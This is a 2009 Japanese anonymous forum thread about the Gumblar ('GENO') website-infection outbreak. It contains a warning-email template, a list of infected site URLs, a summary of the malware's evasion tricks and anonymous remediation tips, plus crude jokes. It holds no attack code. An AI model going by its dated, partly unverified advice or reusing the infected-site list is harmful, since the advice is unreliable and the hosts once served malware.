アヴァさんがトロイの木馬が〜と逝ってたサイトがあったがGENO感染してたサイトなんだろうか・・・。
570 :
名無しさん@九周年:2009/05/18(月) 05:51:40 ID:iMB/dKk90
>>568 構造欠陥のある車で事故多発させてるメーカーが、じゃあ他社の車
にすればいいだろで済む訳がないw
>>567 何のために糞長い契約に同意させてるんだ
572 :
名無しさん@九周年:2009/05/18(月) 05:59:07 ID:D/G7mwwQ0
とりあえずageないとまずい希ガス
構造欠陥ねw
コードの走らない箱は安全ですってか
PCの電源入れなければ安全じゃね?
574 :
名無しさん@九周年:2009/05/18(月) 06:12:49 ID:CQ5PQc840
>>573 実際MacやLinuxのようなUNIX系のOSはアプリとシステムの実行権限を明確にわけて、
万一事故ってもエンジンに火が回らないような構造になっているわけで。
リアルもネットもパンデミックとかマジ勘弁してくれよ。
>>564 夜勤組だがうちの職場はまだ大丈夫で残念だった
577 :
名無しさん@九周年:2009/05/18(月) 07:12:29 ID:8P1Z971o0
これはマズい
578 :
名無しさん@九周年:2009/05/18(月) 07:27:46 ID:R9lUkbpCO
579 :
名無しさん@九周年:2009/05/18(月) 07:28:39 ID:U3WISzXw0
こりゃ対処のしようがないね
580 :
名無しさん@九周年:2009/05/18(月) 07:41:11 ID:ak52KsUV0
小林製薬って変態新聞スポンサーじゃん
581 :
名無しさん@九周年:2009/05/18(月) 07:51:26 ID:vwrjqRk+O
小林製薬の糸ようじ
水曜どうでしょうバカの脊髄反射
582 :
名無しさん@九周年:2009/05/18(月) 08:33:13 ID:GBjgtx7b0
こんないい加減なOS売りつけやがって
こんないい加減なOS買ったのは俺らだがな
>>583 PC買ったら勝手に抱き合わせで買わされただけ。
585 :
名無しさん@九周年:2009/05/18(月) 08:41:17 ID:D/G7mwwQ0
違いないな
586 :
名無しさん@九周年:2009/05/18(月) 08:44:25 ID:B8ZXXUem0
>>583 ユーザは選んで買ったわけじゃないからw
MSが独禁法違反やらかしてまでOSの選択肢潰しやった挙げ句のこの有様。
587 :
名無しさん@九周年:2009/05/18(月) 08:47:19 ID:71KEgZXC0
現代の日本にMacを買えない地域があるとは知らなかった。
cmdでdos立ちあがんねぇwwwwwwwwwwwww俺のpcオタワwwwwwwwwwwマイアミwwwwwwwwwwww
対処わかるまで電源付けっぱなしかよ。一時中断は大丈夫だよな?
>>584,586
リナクソでも入れりゃいいじゃん
590 :
名無しさん@九周年:2009/05/18(月) 08:56:40 ID:4Acil75q0
日立がBeOSのプリインストールの意思をMicrosoftに伝えたところ、Microsoftが彼らの怒りを
伝えるために2人のマネージャーを日本に派遣し、Beとの間の合意やWindowsライセンスについ
て再考するように促した。その結果、起動シーケンスからBeOSの存在を示すものは排除され、
BeOSの起動はフロッピーディスクを必要とする手間のかかるものになってしまったという。
また、Compaqが計画していたBeOS搭載のIAも、Microsoftの圧力により開発途上で中止とな
ったという。
http://pc.watch.impress.co.jp/docs/2002/0220/be.htm
>>584,586
はLinuxが使えないから文句を言ってるわけで
592 :
名無しさん@九周年:2009/05/18(月) 08:58:52 ID:pbw9Zw7f0
XP厨m9(^Д^)プギャー
593 :
名無しさん@九周年:2009/05/18(月) 08:59:22 ID:W/YIvSOb0
XPだけど、Norton入れてたら大丈夫?
594 :
名無しさん@九周年:2009/05/18(月) 09:01:21 ID:SkqoCQVV0
ノートンなんて飾りです
595 :
名無しさん@九周年:2009/05/18(月) 09:03:42 ID:D/G7mwwQ0
質問ですまんが
コマンドプロンプトで
dir C:\Windows\help\mui\0411でentar押して、
いっぱい出てきたんだけどこの中のsqlsodbc.chmが50,727だったらセフセフ?
596 :
名無しさん@九周年:2009/05/18(月) 09:09:31 ID:SkqoCQVV0
セフセフとは言い切れないのが厄介なところ。
解決策はクリーンインストールのみ。
597 :
名無しさん@九周年:2009/05/18(月) 09:12:48 ID:ngLf6PdRO
/)
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ キャッシュ(現金)消されりゃいいんだよ!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
598 :
名無しさん@九周年:2009/05/18(月) 09:12:51 ID:ydPdeS7X0
そもそも、小林製薬の製品で効果があったためしが無い。
全くなんなのよこの会社は!プンプン
アウアウ(^ω^)セフセフ
小林製薬の糸ようじ
601 :
名無しさん@九周年:2009/05/18(月) 09:25:14 ID:D/G7mwwQ0
改ざんされすぎw
やばいな、これは
604 :
名無しさん@九周年:2009/05/18(月) 09:37:07 ID:ILjiVTks0
賠償金でマイクロソフト潰れちゃう!
糸ようじ
GENOウィルスの亜種なのか?
とりあえず最新版にupdateしてJavaScriptをOFF、
セキュ板であげられていたIPを遮断した
608 :
名無しさん@九周年:2009/05/18(月) 09:45:27 ID:ngLf6PdRO
/)
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ ネカフェで閲覧すりゃあいいんだよ!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
609 :
名無しさん@九周年:2009/05/18(月) 09:50:49 ID:hO6Rg88U0
みっちゃんがあやしい・・・
アッー!小林製薬
インターネットを見てるとブラクラに引っかかった!
そんな時ってありますよね
そんな時は小林製薬のウイルスニゲール!
薬効成分のTDNとDBがウイルスを撃退!
これで安心してインターネットを楽しめます
小林製薬のウイルスニゲール
おっ、立ってたのか
613 :
名無しさん@九周年:2009/05/18(月) 10:46:19 ID:OAeOOqii0
614 :
名無しさん@九周年:2009/05/18(月) 11:06:55 ID:TMuyMuTt0
次スレが立つのならば、スレタイをもう少し変えたほうがいい
GENOウイルスって通称を使ってくれ
ネサフできねぇよ。
いつになったら治まるんだ。
いい加減にしてくれ。
616 :
名無しさん@九周年:2009/05/18(月) 11:10:58 ID:E3Qs7hHUO
どうバカ集合糸ようじスレ
617 :
感染サイトを発見した場合の警告メールテンプレ:2009/05/18(月) 11:14:09 ID:TMuyMuTt0
Webサイト製作 ご担当者さま
■ お願い
御社のHPに、閲覧者のPCに、第三者のサイトよりマルウェア(コンピュータウイルス)を
ダウンロードさせるスクリプトが挿入されております。
状況確認の上、感染PCからのウイルス除去と、HPの修正、閲覧者向けの告知をお願いします。
この攻撃プログラムは、Adobe Acrobat Reader、Adobe Flash Playerの脆弱性を利用して
パソコンの中にスパイプログラムを送り込みます。 Windows XP、2000とAcrobat Reader、
Flash Playerの古いバージョンが組み合わさった場合、この攻撃を受けてしまいます。
同様のスクリプトの仕込まれたHPを閲覧することで、そのPCにウイルス本体が感染します。
感染したPCを利用して、HPの更新作業を行なうと、(該当PCで稼働中のマルウェアが行なったのか、
FTPのIDとパスを盗みだした外部からのアクセスかはわかりませんが)感染を広げるための
スクリプトの埋め込みを行なうようです。
他者から報告があり、当方でも確認したところ、確かに危険コードが含まれておりました。
HP閲覧者のPCにウイルスが勝手にダウンロードされてしまうため、御社のHPが意図せぬ加害者と
なっております。
■ 確認した感染ページ
<多分、全てのページが感染中>
●HTMLファイルの場合
<body>タグの直前に難読化されたコードが埋め込まれる。
(例外的に<body>タグが存在しないページの場合は危険コードの挿入箇所を見付けられず
危険コードが埋めこまれないようです)
●PHPの場合
ファイルの最初に難読化されたコードが埋め込まれる。
●JSの場合
ファイルの最後に難読化されたコードが埋め込まれる。
その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。
618 :
名無しさん@九周年:2009/05/18(月) 11:24:06 ID:G4+RNVgNO
感染にまったく気づいてなくて、ある時ふと再起動した瞬間死亡とか
619 :
名無しさん@九周年:2009/05/18(月) 11:27:17 ID:TMuyMuTt0
感染確定サイト (14)
senn特殊光源 www.senlights.co.jp/index.html
livmail www.livmail.com/3others-page/janet/tokusen/index.htm 既出
スカイハイプレミアム skyhighpremium.com 追加
Carwash
http://www.carwash.co.jp/ 既出
成美○出版 www.seibidoshuppan.co.jp/ 既出
Akemi ○ayashi Website replica08.web.fc2.com/ 既出。チェッカで1000%
主上支局
http://ssfos.hp.infoseek.co.jp/ テイアラモード www.tiaramode.com ここも散々既出でしょうけど
ペットの姓名判断のサイト www.laqoo.net/kyouun/pet/index.html
帰ってき○三日天下 mikkatenka.sakura.ne.jp/ 黒
烏骨鶏 www.ukokkei.co.jp 確定
株式会社まどか www.madoka-soft.co.jp ここも
リボンマジック www.ribbonmagic.com 発端だと言われているサイト、チェッカー結果1000%で真っ黒
Replica replica08.web.fc2.com/index.html 感染確定サイト、対処予定ですが現在真っ黒。
感染対策済みのサイト(10)
・小林製薬
・BIG-server.com】
・ウェルネス(医療情報提供企業)
・薬事日報社
・国交省中部地方整備局岐阜国道事務所
・全日本民医連
・総合ホビー展示即売会「ホビコン」
・GENO(PC通販ショップ)
・NHT紀尾井町グループ(自毛植毛斡旋企業)
・SayMove!
・ライブハウス「あさがやドラム」
vistaで良かった
avast以外は対応してないのか?
ESET使ってるんだけど一時的にでもavastに切り替えた方がいいんだろうか
製薬会社HPがウイルス感染
ちょっとしたギャグだな
623 :
名無しさん@九周年:2009/05/18(月) 12:08:26 ID:vUnU8aGU0
晒しage
624 :
名無しさん@九周年:2009/05/18(月) 12:11:52 ID:9v4hxk8l0
>>620 って初めて思ったんですね。わかります。
625 :
名無しさん@九周年:2009/05/18(月) 12:16:25 ID:Kr7TWgaXO
>>621 avastが大暴れするから回避出来るよ。
まぁ後は運だわな
626 :
名無しさん@九周年:2009/05/18(月) 12:17:06 ID:oTHQvIjAP
627 :
名無しさん@九周年:2009/05/18(月) 12:18:22 ID:oGaKr69G0
>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと=システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS9以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。
Vistaだから大丈夫!(*^ー゚)b
薬にウイルスじゃなくてよかったじゃないか
630 :
名無しさん@九周年:2009/05/18(月) 12:51:15 ID:3K7uShbQ0
FTP使ってサイトやってる奴や
ネットでクレカとか使って買い物してる奴は気をつけろな
>>630 まあ気をつけると言ってもその程度だよな
ESETというかNOD32ユーザーだけど、感染してたんでクリーンインスコして
一時的にavast!に入れ替えてるよ
…単に実家にNOD32のCDを置き忘れてきたからなんだけどね
633 :
名無しさん@九周年:2009/05/18(月) 13:08:37 ID:k8klozggO
いやーネットサーフィン超自粛とか、
気をつけることはあるさ。
仕事でネット使う場合は困るけどなー
ほんとどうしよう。。
634 :
名無しさん@九周年:2009/05/18(月) 13:17:42 ID:SkqoCQVV0
俺なんかAdobe Acrobat ReaderもAdobe Flash Playerも
アンインストールしちゃった。
動画サイト観れねぇ。
>>634 羹に懲りて膾を吹いたんですね(^_^;)
;;;;;;;;;;;/゙::::::::::::: \::::\ ミ川川川川川川彡
;;;;;;;/::::::::::::::::::::::: ヽ:::゙|ヽ ミ 彡
;;;/::::::::::::::::::::::::::::::::: \l,ll, 三 な 三
/::::::::::::::::::::::: : : : :::::' ヽ || 三 ぜ 三
:::::::::::::::::::::: : : : ::||| 三 な 三
:::::::::::::::::::: : :||| っ こ 三
:::::::::::::::: : :|| i て ん 三
:::::::::::::: : ,,,,,,,,,,,,,,,,,_ : :|| l,_ し な 三
;;::::::::::: | ゙゚\, ゙|| ll゙\ ま こ 三
:::;:::::::: : \,:::::::::::::::::::::: li ||:::::::::l っ と 三
;:::::::::: .\,:::::::::::::::::::/ ,r::::_/ た に 三
:::::::::::: ヽ一一''° l゙ll″ ん 三
:::::::::::: l|ll だ 三
:::::::::::: ,lll′ 三
,、::::::::: ,ll゜ 三
;ヽ::::::::::: _____ll′三 三
;;;;;ヽ::::::::: ||___| 彡 ミ
;;;;;;;ヽ,:::::::: | l___|ヽ 彡川川川川ミ
;;;;;;;;;;\,,,____\_/__/ \
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\ :::::::: ::::――ヽ
気付かなかった一応立ってたのか
sqlsodbc.chmでヘルプが開かなかったらアウツ
638 :
名無しさん@九周年:2009/05/18(月) 13:50:40 ID:k8klozggO
パンデミックあげ。
639 :
名無しさん@九周年:2009/05/18(月) 13:57:54 ID:w7sT445x0
楽天サイトも感染してたんかいな!!いつ頃?
4月に買い物してるよorz
>>324 JSという略称はすでに「ジャストシステム」が持っている。
「JaSc」という略し方はどうだろう?
641 :
名無しさん@九周年:2009/05/18(月) 14:02:23 ID:kvG3D77Q0
このウイルスより、断然悪質なウイルスが小林
642 :
名無しさん@九周年:2009/05/18(月) 14:06:35 ID:PLOnJFvxO
糸ようじ、なまら人気だな
マスクを付けろ、マスクを。
644 :
名無しさん@九周年:2009/05/18(月) 14:07:29 ID:lvP+ZpPOO
製薬会社で感染(笑)
ウィルスその後に
646 :
名無しさん@九周年:2009/05/18(月) 14:21:01 ID:0lBhpUya0
avast入れてみて、
>>619の烏骨鶏のサイトアドレスをぐぐってみたら
ぐぐるの検索結果ページで変なメッセージと警告窓発動
これってどういう事?ぐぐっただけでもアウトなの?
今のところcmd・regedit起動可能、sqlsodbc.chmは50,727
電源落とすの怖ええぇぇ・・・
647 :
名無しさん@九周年:2009/05/18(月) 14:21:06 ID:f9K7Gsdf0
>>630 クレカは保険効くから問題無いだろ?
まぁ、インフルよりこっちのウイルスが蔓延した方が
保険屋は涙目になるかもしれないけどw
648 :
名無しさん@九周年:2009/05/18(月) 14:21:30 ID:u3wqDbKK0
これ検索サイトがやられたら大変なことになるなwwwwwwwww
ヤフー グーグル とかマジで頼んだwwwwwwwwww
俺もヤバイwwwwwwwwww
会社のシステム管理の俺も2年ぶりについに動く時が・・・。
社員に嫌な顔されるわ。笑
652 :
名無しさん@九周年:2009/05/18(月) 14:39:06 ID:AEdKJ2Og0
これって、ひょっとして、グーグル大打撃?
グーグル検索怖くなって、最近避けるようになってきた。
>>653 1. ロケーションバーに"about:config"と入力してEnterキーを押す。(入力する際に「"」は不要)
2. フィルタに"network.prefetch-next"と入力してEnterキーを押す。(入力する際に「"」は不要)
3. 値が"true"な場合は"true"をダブルクリックして"false"にする。(初期設定値は"true")
655 :
名無しさん@九周年:2009/05/18(月) 14:43:02 ID:SkqoCQVV0
先読み切らないと検索トップに感染サイトの名前が出ただけで感染!
ってどっかのスレで読んだ。
スーパーハカー現る
658 :
名無しさん@九周年:2009/05/18(月) 15:02:22 ID:hO6Rg88U0
糸ようじ菌に感染。
>>651 まとめサイト見に行ってた、先読み機能もなんとかOFF官僚
サンクス
AVGじゃ検知されんのか・・・avestに切り替えるしかないか・・・。
661 :
名無しさん@九周年:2009/05/18(月) 15:49:06 ID:0YzfXGVP0
セキュリティ板で暴れまくってる同人サイトの腐女子見てると
イラッと来る
662 :
名無しさん@九周年:2009/05/18(月) 15:49:41 ID:Q8SIkBp/0
>>660 ベストを尽くしてくれそうな良いソフト名だな
663 :
名無しさん@九周年:2009/05/18(月) 16:04:39 ID:n17zy5f8O
これJaneでjpgのリンク踏んだだけで感染するのかすら?
664 :
名無しさん@九周年:2009/05/18(月) 16:52:25 ID:0YzfXGVP0
5 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 16:11:47 ID:ua7Ctj4Z0
>>1 テンプレの症状にある「再起動時にBSOD」は、
起動時にLANケーブルが抜かれていたり、IPブロックされていると
攻撃者のIPに繋がらないため、クラッシュさせる挙動だそうです。
22 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 16:30:30 ID:eOHkXG3n0
>>5 起動時にLANケーブルがついていたり
IPブロックされていなければ、
攻撃者のIPにつながるから、クラッシュさせる挙動をとらない
ということになるの?
692 名前: ビオラ(宮城県)[sage] 投稿日:2009/05/18(月) 16:37:39.34 ID:nQjoclSR
>>689 ウィルス引いたらLANケーブル抜けっていう初歩対処に対しての報復か
つくづく手が込んでる
665 :
名無しさん@九周年:2009/05/18(月) 16:54:43 ID:/Yo/cfP70
767 :本当にあった怖い名無し:2009/05/17(日) 16:24:24 ID:sIzAEXxG0
Firefoxだと検索するだけで感染するから恐ろしい
666 :
名無しさん@九周年:2009/05/18(月) 16:56:34 ID:0YzfXGVP0
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。
インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、
亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
※検出率が上がる頃には次の種類になっている
つくづく手の込んだウィルスだなぁ
製作者の努力の結晶か
人間、頑張って努力すれば、ここまで凄い事が出来るんだね!
669 :
名無しさん@九周年:2009/05/18(月) 17:13:29 ID:OAeOOqii0
この努力を他の事へr
>>667 以前もLIRVAとか複合的な最強最悪ウィルスってあったからな。
世界的に偽札作りと同じくらいの重大犯罪として対処しない限り、
もっと強力なのがいくらでも作られる。
671 :
名無しさん@九周年:2009/05/18(月) 18:08:33 ID:wQSjB5Wk0
もう糞ニートプログラマの就職活動に付き合わされるのは嫌だお・・・
672 :
名無しさん@九周年:2009/05/18(月) 18:08:42 ID:tABKxumw0
おそろしい
673 :
名無しさん@九周年:2009/05/18(月) 18:11:12 ID:tABKxumw0
早くセキュリティ会社もなんとかしてほしい
確認とって今は自分いいけどさ
674 :
名無しさん@九周年:2009/05/18(月) 18:19:22 ID:0YzfXGVP0
http://www.so-net.ne.jp/security/news/view.cgi?type=2&log=top ■商標登録ホットライン
商標登録専門サイト「商標登録ホットライン」を運営する大槻国際特許事務所(大阪市東淀川区)は15日、
同サイトが改ざんされていたことを明らかにした。
■アイマジック
ゲームソフト制作のアイマジック(本社:神奈川県)は14日、同社サイトの一部が改ざんされていたことを明らかにした。
■BIG-server.com、再び改ざん
ゼロ(札幌市厚別区)が運営するレンタルサーバーのBIG-server.comは14日、
「maido3.com」ホームページ内の「【ぷろじぇくと ぞうさん】〜E-Bananaサーバ 構築日記〜」の
トップページが改ざんされていたことを明らかにした。
■ミュージック・オン・ティーヴィ
衛星放送の音楽専門チャンネルを運営するミュージック・オン・ティーヴィ(本社:東京都港区)は14日、
同社サイト「MUSIC ON! TV」の一部が改ざんされ、不正なスクリプトが埋め込まれていたことを明らかにした。
■ライブハウス あさがやドラム
ライブハウス あさがやドラム(東京都杉並区)のホームページが改ざんされていたことが分かった。
■小林製薬
小林製薬(本社:大阪市中央区)は12日、同社サイトの一部が改ざんされていたことを明らかにした。
(2009/05/18 セキュリティ通信)
675 :
名無しさん@九周年:2009/05/18(月) 18:20:28 ID:fz1hV5/D0
普通に、Flash Player アップデートすれば解決だろ、JK。
flashとreaderアンインストール
これに勝る物はないのだよ、ヤマトの諸君
>>670 このウイルスってどのくらいの価値(損害)があるんだろう、貨幣的に
678 :
名無しさん@九周年:2009/05/18(月) 18:47:50 ID:K5E4wBeH0
とりあえずFlash Player最新にしてAdobe Readerアンインスコ
pdfなんか使わねえしもうイラネ
679 :
名無しさん@九周年:2009/05/18(月) 18:48:20 ID:0YzfXGVP0
>>677 米ScanSafeは、「gumblar.cn」がばらまいた悪質なファイルは、
ボットネットからの命令を待つためのバックドアをインストールするようだとしている。
ボットネットとは、悪意のある攻撃者によって構築され、
インターネット経由の命令によって遠隔操作をされてしまっているコンピュータ群のことである
思うままに何万というコンピュータを操作して情報取り出せるならその価値プライスレスじゃ?w
firefoxの連中は先読み機能で即死か?
681 :
名無しさん@九周年:2009/05/18(月) 18:51:27 ID:693WARvU0
製薬会社でウイルスとはww
俺のPCが遠隔操作されて
「個人情報来たアルよ・・・」
「アイヤー男の裸ばかりアルヨ! 隔離アルヨ」
ふふふ、ボットの愚か者が
そういや、おとといあたりから ようつべに繋がりにくいんだが、あそこも 感染ルンです?
金盾
mixiのトップページとか感染したらえらいことになるな
小林製薬って変態新聞スポンサーで
オカ板の呪いかかってたな
687 :
名無しさん@九周年:2009/05/18(月) 19:12:16 ID:/pGmA5eK0
ノートンも対応したとか聞いたけど、今のところ対応してるのは
avastとノートン(未確認)だけ?
これって、感染してる人がhtmlをftpでアップロードすることによって
感染サイトが一丁上がりって感じ?
690 :
名無しさん@九周年:2009/05/18(月) 19:18:59 ID:0YzfXGVP0
そもそもの発端はここらしいが、未だに対処なしか?
リボンマジック公式サイト
このサイトはコンピュータに損害を与える可能性があります。
このたび、諸般の事情により『Kram〜サヨナラによく似た時計の音楽〜』のリボンマジックでの ...
リボンマジックの次回作につきましては、準備ができ次第、当サイトで発表いたします。
今後とも、リボンマジックへのご愛顧のほど、よろしくお願いいたし ...
www.ribbonmagic.com/ - 類似ページ
リボンマジック BBS
このサイトはコンピュータに損害を与える可能性があります。
リボン マジック公式サイト☆ リボンマジックの公式サイトへようこそ。
ゲームの紹介、情報等。18禁乙女ゲームメーカー。
www.ribbonmagic.com/FS-APL/FS-BBS/index.cgi?Code=bbs - 類似ページ
ミクシーもフラッシュたんまり使っているんだよねぇ。
GENO様曰く、「キャッシュ削除すりゃ大丈夫」だろ。
お前ら心配するな。
それはそうとアンチウイルスソフトを過信するなよ。
結局は自分次第だ。
まとめ見たりチェックしたりしたけど
もう面倒くさくなったのでAdobeはアンインストした。
動画サイト見れなくなったけど気にしないwww
694 :
名無しさん@九周年:2009/05/18(月) 20:33:11 ID:yoax0n8Z0
同じくadobeの全部抜いたw
感染しないですむならそれでおけ
動画はワクチン出来てから見るよ
火狐でジャバスクリプトも切ったしノースクリプト入れた
ぐぐる先生の先読み機能も切った
2ちゃんは専ブラのみ、ふらふらネサフするのはヤメ
これで感染したら悲しすぎる。
695 :
名無しさん@九周年:2009/05/18(月) 20:56:53 ID:NlsFiN+qO
・・・ダチに小林製薬のホムペがウイルス食らってやべーらしいぞと言う話を聞いて、わざわざ覗きにいっちまった。
数日前の話だが・・・
くそっ、小林製薬はフェミニーナ軟膏をカユマンコナオールに改名しろ!
696 :
名無しさん@九周年:2009/05/18(月) 21:05:02 ID:gFMRd/suO
パソコンを起動したら変な音が聞こえてきたんだが。
気になって音量マックスにしたら外国男がハァハァ言ってる
アバストでウイルス検査してもなにも出てこねーし。身に覚えが腐るほどあるだけに恐いよ
閲覧だけじゃ無理だろ
特にトロイだと、埋め込まれた実行部が仮想ファイルかなんかで起動しないと動くわけないし。
下手なプラグインとか入ってるからじゃないの? javascript有効とかさ。
698 :
名無しさん@九周年:2009/05/18(月) 21:07:26 ID:NlsFiN+qO
699 :
名無しさん@九周年:2009/05/18(月) 21:15:41 ID:GzROcZt10
テレビ局の陰謀だな
ネットの方がおもろいしテレビなんて見てねーよwww
なんていってるから
700 :
名無しさん@九周年:2009/05/18(月) 21:16:08 ID:OAeOOqii0
>>698 コンセントに足引っかけて転ぶだけじゃないんだなw
701 :
名無しさん@九周年:2009/05/18(月) 21:17:26 ID:yn2upanS0
adobe Flashのアップデートってどうやるの?
普通にインストールすればアップデートしてくれるの?
プロンプトもregeditも起動するからセフセフか
つかgeno問題拡散してたのかよwww
703 :
名無しさん@九周年:2009/05/18(月) 21:29:16 ID:GzROcZt10
>>702 亜種だとそこは問題なくとも感染してたってのあるみたいだから
気になるなら対策やってるとこいって調べたらいい
704 :
名無しさん@九周年:2009/05/18(月) 21:30:08 ID:gFMRd/suO
>>698 俺はホモでもショタでもねーぞ!ロリコン一筋だ。なんでマイケルが俺のパソにいつくのか小一時間説明して貰おうか
706 :
名無しさん@九周年:2009/05/18(月) 21:32:13 ID:1R40pn2I0
いちごきんたまとコレどっちが兇悪?
こっちか
ようつべ見て感染することはあるんでしょうか?
709 :
名無しさん@九周年:2009/05/18(月) 21:40:29 ID:SkqoCQVV0
トップページの左上、 Flash playerのバナーをクリックすれば勝手に最新
がダウンロード。
710 :
名無しさん@九周年:2009/05/18(月) 21:43:20 ID:SkqoCQVV0
右上だった
去年のPWN to OWNの結果を知るべきw
712 :
名無しさん@九周年:2009/05/18(月) 21:47:37 ID:gM3s5Ulj0
え、もしかしてブラウザごとにフラッシュバージョン上げないと駄目なの?
いつもオペラだからオペラしかバージョン上げてないんだけど…
IEもスレイプニルもfirefoxも入れてるんだけど。。
713 :
名無しさん@九周年:2009/05/18(月) 21:49:14 ID:GYhmQZ7F0
>>712 フラッシュとアクロバットリーダの隙をついてるので
全部更新しないとだめ。
714 :
名無しさん@九周年:2009/05/18(月) 21:50:45 ID:eHnHypqo0
一番簡単に感染を判定するには
LANケーブルを抜いて再起動すればいいんだな
foxit Reader使ってる俺は勝ち組?
716 :
名無しさん@九周年:2009/05/18(月) 21:55:55 ID:OAeOOqii0
>>703 なるほどありがとん
まあたまに強力なウィルスがでてくるのはネットの醍醐味だが
面倒だからかかりたくはないな
718 :
名無しさん@九周年:2009/05/18(月) 21:57:22 ID:gM3s5Ulj0
>>713 ありがとう、今から全部更新してくるorz
>>707 感染のメカニズムはこっちの方が凶悪だけど、
感染後の挙動は、いちごの方が凶悪じゃない?
720 :
名無しさん@九周年:2009/05/18(月) 22:09:32 ID:Mfh5EE/L0
フラッシュプレイヤーが最新で、
アドベリーダーってのが、9.1なら大丈夫ってことか?
>>695 台風の日に用もないのに海岸に行って波に飲まれるヤツだなwwww
>>720 283 名前: チドリソウ(dion軍)[sage] 投稿日:2009/05/18(月) 22:18:14.02 ID:fFtL8VLz
なあお前ら、念のために聞いておくが・・・
AdobeReaderを8以前から最新の9.1にアップデートして安心してないよな?
普通にAdobeからダウンしただけでは9.1.0がインスコされる。
しかしこれではGENOウィルスに無防備。
9.1を起動してアップデートすると9.1.1になる。
これがGENOウィルス対策版だ。
前にセキュリティー関連のポッドキャストでsandboxieってソフトを薦めてたよ。VMとはちと
違うんだが、sandboxという隔離された領域をつくって、その中だけでブラウザとかを
動作させるのでブラウザ経由で変なものがインストールされても、それはsandboxの外には影響を
与えんという触れ込みのソフト。うちはosが非対応だから使ったことがないが。
724 :
名無しさん@九周年:2009/05/18(月) 22:34:16 ID:fAQ6Ecco0
>>706 > 普段Firefoxしか使ってないから確認したら、IEのフラッシュバージョンは9だったw
まさに俺もその状態で、IEのFlashアップデートしようとしたら
なんかセキュリティのためにActiveX使えなくなってて
アップデートできねえw
セキュリティレベル最低にしてもActiveX使えないってなんなんだw
725 :
名無しさん@九周年:2009/05/18(月) 22:49:21 ID:Mfh5EE/L0
>>722 なるほど
9.1.1/8.1.5/7.1.2のどれかなら(一応)対策されてるってことか?
天使の耳かきの情報を見るために、5月頭にサイトを見てたぜ
こわいこわい
Web業界の人間は洒落にならんワームだよなあ
もっと騒ぎになって良いはずなのに、なんでこんな水面下進行なんだろ
728 :
名無しさん@九周年:2009/05/18(月) 23:16:55 ID:Mfh5EE/L0
フラシュプレイヤーの方は10,0,22,87でいいのかな?ω?
729 :
名無しさん@九周年:2009/05/18(月) 23:37:03 ID:CDquL2d+0
フォトショップアンインストールしてて暫くみれなくてもいいやーと思っていたpsdファイルが
フラッシュプレイヤー入れて見れたのにびびってプレイヤーもアンしたところだった
勝手に関連づけるのね
Vistaだから?
まあ今回は助かったようだけど
730 :
名無しさん@九周年:2009/05/18(月) 23:38:50 ID:9vZ/4QlT0
731 :
名無しさん@九周年:2009/05/18(月) 23:48:24 ID:Mfh5EE/L0
d
まぁ、一応最新版にしたけど
俺の使ってるAVG君が対応するまでネット巡回は避けるわ〜
ちょっとサイトの様子を見てくる
733 :
名無しさん@九周年:2009/05/18(月) 23:52:49 ID:UumZnpy10
家政婦は見た。そのサイトを。
>>727 業界人の中でも、ちゃんとした知識を持っているヤツはともかく
その周辺で玄人気取りなヤツが問題なわけで。
横から見た対処法を、勘違いで覚えて実行されて大惨事とか、冗談じゃねぇや。
だから慌てず騒がす、静かにやらざるを得ない。
これって、Spybotとかspyware Brasterとかではじけないのかな?
739 :
名無しさん@九周年:2009/05/19(火) 01:34:56 ID:u51XYROLO
某サイトの様子を携帯からそっと覗いたら、
そのサイトのブックマークのリンクが
大量に消してあった。
こえぇぇ。。
avast先生がこれだけ心強く思えたことはない
化石のMe使ってる俺はどうすれば・・・
とりあえず、レジストリエディタは立ち上がった。
cmd.exeは無いので
MS-DOSプロンプトで「dir C:\WINDOWS\system32\sqlsodbc.chm」を探したら無かった。
AcrobatReaderはアンインスコ
火狐のJavaスクリプトは切って、先読みも外した
Flashは残念ながら9までしか入らん
あーヤダ、めんどくせぇ
そもそも無ければ心配しなくても良かったのでは
>>635 あつものとか、なますとか、難しい漢字使うな。
つか、なますはともかく、あつものって何?
やっぱ熱いもの?
羊羹ってジンギスカン?
羹(あつもの)は要するに肉やら野菜やらの入った熱い汁物のこと。
羊羹とはその名の通り羊のあつもので、冷えるとゼラチン質のせいで固まった。
肉の食えない坊さんが、小麦粉やら葛粉と小豆でそれを模して作ったのが今の日本の羊羹。
今朝からavastがクルクルしなくなったのだが・・・
adobe自体入れてないんだけど大丈夫?
>>745 変わりにお前の頭がクルクル回ってるから安心しろ
749 :
名無しさん@九周年:2009/05/19(火) 10:09:25 ID:V+8FTUkO0
750 :
名無しさん@九周年:2009/05/19(火) 10:27:07 ID:kq0G1PYC0
いつまで続くんだこれ?
束縛された
いんたーねっつは不便でしょーがねぇ
751 :
名無しさん@九周年:2009/05/19(火) 10:41:59 ID:t6LblqML0
なんでニュー速+ではこんな盛り上がってないの?
皆気づいてスルーしてるんならいいけど、
全然気づいてない人も結構居るんだろうなぁ…怖いよ。
752 :
